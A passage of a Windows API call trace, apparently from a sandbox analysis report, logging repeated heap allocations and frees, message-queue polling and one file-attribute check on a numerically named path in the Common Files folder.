(HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24ea0 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e70 [0263.596] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e70 | out: hHeap=0xc60000) returned 1 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d708 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a6a8 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e70 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24eb0 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a690 [0263.596] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e70 | out: hHeap=0xc60000) returned 1 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79be0 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e70 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e50 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79d78 [0263.596] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e70 | out: hHeap=0xc60000) returned 1 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79bc8 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e70 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e20 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a618 [0263.597] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e70 | out: hHeap=0xc60000) returned 1 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a648 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e70 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e90 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79bf8 [0263.597] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e70 | out: hHeap=0xc60000) returned 1 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79e08 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e70 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24ec0 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a6d8 [0263.597] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e70 | out: hHeap=0xc60000) returned 1 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79af0 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e70 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24ed0 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a498 [0263.597] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e70 | out: hHeap=0xc60000) returned 1 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a318 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e70 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24ee0 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a450 [0263.597] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e70 | out: hHeap=0xc60000) returned 1 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a960 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e70 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24ef0 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a2e8 [0263.597] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e70 | out: hHeap=0xc60000) returned 1 [0263.597] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc9b048 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe9d708 | out: hHeap=0xc60000) returned 1 [0263.598] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a270 [0263.598] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e70 [0263.598] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24f00 [0263.598] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3f0 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e70 | out: hHeap=0xc60000) returned 1 [0263.598] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a2b8 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79ad8 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24ea0 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a6a8 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a690 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24eb0 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79be0 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79d78 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e50 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79bc8 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a618 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e20 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a648 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79bf8 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e90 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79e08 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a6d8 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24ec0 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79af0 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a498 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24ed0 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a318 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a450 | out: hHeap=0xc60000) returned 1 [0263.598] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24ee0 | out: hHeap=0xc60000) returned 1 [0263.599] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a960 | out: hHeap=0xc60000) returned 1 [0263.599] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a2e8 | out: hHeap=0xc60000) returned 1 [0263.599] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24ef0 | out: hHeap=0xc60000) returned 1 [0263.599] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a270 | out: hHeap=0xc60000) returned 1 [0263.599] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3f0 | out: hHeap=0xc60000) returned 1 [0263.599] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24f00 | out: hHeap=0xc60000) returned 1 [0263.599] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a2b8 | out: hHeap=0xc60000) returned 1 [0263.599] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9b048 | out: hHeap=0xc60000) returned 1 [0263.599] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79d60 | out: hHeap=0xc60000) returned 1 [0263.599] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe9d9d8 | out: hHeap=0xc60000) returned 1 [0263.599] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e60 | out: hHeap=0xc60000) returned 1 [0263.599] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79d60 [0263.599] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a678 | out: hHeap=0xc60000) returned 1 [0263.599] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79ce8 | out: hHeap=0xc60000) returned 1 [0263.599] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe9d550 | out: hHeap=0xc60000) returned 1 [0263.599] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e80 | out: hHeap=0xc60000) returned 1 [0263.599] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d550 [0263.599] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79ce8 [0263.599] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e80 [0263.599] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79ce8 | out: hHeap=0xc60000) returned 1 [0263.599] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d9d8 [0263.599] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79ce8 [0263.599] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a678 [0263.599] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79d60 | out: hHeap=0xc60000) returned 1 [0263.599] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.599] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24e60 [0263.599] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24f00 [0263.599] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d708 [0263.599] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79d60 [0263.599] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24ef0 [0263.600] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a2b8 [0263.600] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24ee0 [0263.600] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xd8d998 [0263.600] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3f0 [0263.600] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24ed0 [0263.600] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7f388 [0263.600] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3f0 | out: hHeap=0xc60000) returned 1 [0263.600] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3f0 [0263.600] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x80) returned 0xcc6f88 [0263.600] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f388 | out: hHeap=0xc60000) returned 1 [0263.600] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3f0 | out: hHeap=0xc60000) returned 1 [0263.600] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3f0 [0263.600] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3f0 | out: hHeap=0xc60000) returned 1 [0263.600] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd8d998 | out: hHeap=0xc60000) returned 1 [0263.600] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24ee0 | out: hHeap=0xc60000) returned 1 [0263.600] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24ef0 | out: hHeap=0xc60000) returned 1 [0263.600] GetFileAttributesW (lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370" (normalized: "c:\\progra~2\\common~1\\26207383702620738370")) returned 0x20 [0263.600] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcc6f88 | out: hHeap=0xc60000) returned 1 [0263.600] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24ed0 | out: hHeap=0xc60000) returned 1 [0263.600] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a2b8 | out: hHeap=0xc60000) returned 1 [0263.600] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79d60 | out: hHeap=0xc60000) returned 1 [0263.600] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe9d708 | out: hHeap=0xc60000) returned 1 [0263.600] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24f00 | out: hHeap=0xc60000) returned 1 [0263.600] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e60 | out: hHeap=0xc60000) returned 1 [0263.600] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed2eb8 [0263.600] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.601] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed2eb8 | out: hHeap=0xc60000) returned 1 [0263.601] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.601] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d708 [0263.601] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79d60 [0263.601] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e60 [0263.601] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79d60 | out: hHeap=0xc60000) returned 1 [0263.601] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9cc68 [0263.601] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79d60 [0263.601] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a2b8 [0263.601] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24f00 [0263.601] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a2b8 | out: hHeap=0xc60000) returned 1 [0263.601] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24f00 | out: hHeap=0xc60000) returned 1 [0263.601] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.601] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d410 [0263.601] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a2b8 [0263.601] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24f00 [0263.601] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a2b8 | out: hHeap=0xc60000) returned 1 [0263.601] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d5c8 [0263.601] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a2b8 [0263.601] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3f0 [0263.601] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24ed0 [0263.601] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3f0 | out: hHeap=0xc60000) returned 1 [0263.601] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24ed0 | out: hHeap=0xc60000) returned 1 [0263.601] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.601] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d320 [0263.601] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3f0 [0263.601] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24ed0 [0263.601] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3f0 | out: hHeap=0xc60000) returned 1 [0263.601] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9cc90 [0263.601] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3f0 [0263.601] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a270 [0263.602] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24ef0 [0263.602] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a270 | out: hHeap=0xc60000) returned 1 [0263.602] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24ef0 | out: hHeap=0xc60000) returned 1 [0263.602] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.602] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d370 [0263.602] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a270 [0263.602] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24ef0 [0263.602] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a270 | out: hHeap=0xc60000) returned 1 [0263.602] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7f388 [0263.602] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a270 [0263.602] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a2e8 [0263.602] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24ee0 [0263.602] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a2e8 | out: hHeap=0xc60000) returned 1 [0263.602] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24ee0 | out: hHeap=0xc60000) returned 1 [0263.602] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.602] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9cc40 [0263.602] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a2e8 [0263.602] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24ee0 [0263.602] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a960 [0263.602] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a450 [0263.602] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24ec0 [0263.602] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a450 | out: hHeap=0xc60000) returned 1 [0263.602] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24ec0 | out: hHeap=0xc60000) returned 1 [0263.602] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.602] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d4b0 [0263.602] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a450 [0263.602] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24ec0 [0263.602] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a450 | out: hHeap=0xc60000) returned 1 [0263.602] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9da00 [0263.602] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a450 [0263.603] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a318 [0263.603] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24e90 [0263.603] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a318 | out: hHeap=0xc60000) returned 1 [0263.603] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e90 | out: hHeap=0xc60000) returned 1 [0263.603] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.603] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9da28 [0263.603] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a318 [0263.603] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e90 [0263.603] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a318 | out: hHeap=0xc60000) returned 1 [0263.603] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9da50 [0263.603] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a318 [0263.603] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a498 [0263.603] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24e20 [0263.603] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a498 | out: hHeap=0xc60000) returned 1 [0263.603] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e20 | out: hHeap=0xc60000) returned 1 [0263.603] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.603] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9da78 [0263.603] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a498 [0263.603] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e20 [0263.603] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a498 | out: hHeap=0xc60000) returned 1 [0263.603] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9daa0 [0263.603] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a498 [0263.603] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79af0 [0263.603] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24e50 [0263.603] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79af0 | out: hHeap=0xc60000) returned 1 [0263.603] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e50 | out: hHeap=0xc60000) returned 1 [0263.603] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.603] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9dac8 [0263.603] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79af0 [0263.603] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e50 [0263.604] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79af0 | out: hHeap=0xc60000) returned 1 [0263.604] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9daf0 [0263.604] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79af0 [0263.604] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a6d8 [0263.604] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24eb0 [0263.604] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a6d8 | out: hHeap=0xc60000) returned 1 [0263.604] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24eb0 | out: hHeap=0xc60000) returned 1 [0263.604] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.604] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9db18 [0263.604] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a6d8 [0263.604] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24eb0 [0263.604] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a6d8 | out: hHeap=0xc60000) returned 1 [0263.604] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9db40 [0263.604] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a6d8 [0263.604] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79e08 [0263.604] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24ea0 [0263.604] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79e08 | out: hHeap=0xc60000) returned 1 [0263.604] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24ea0 | out: hHeap=0xc60000) returned 1 [0263.604] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, 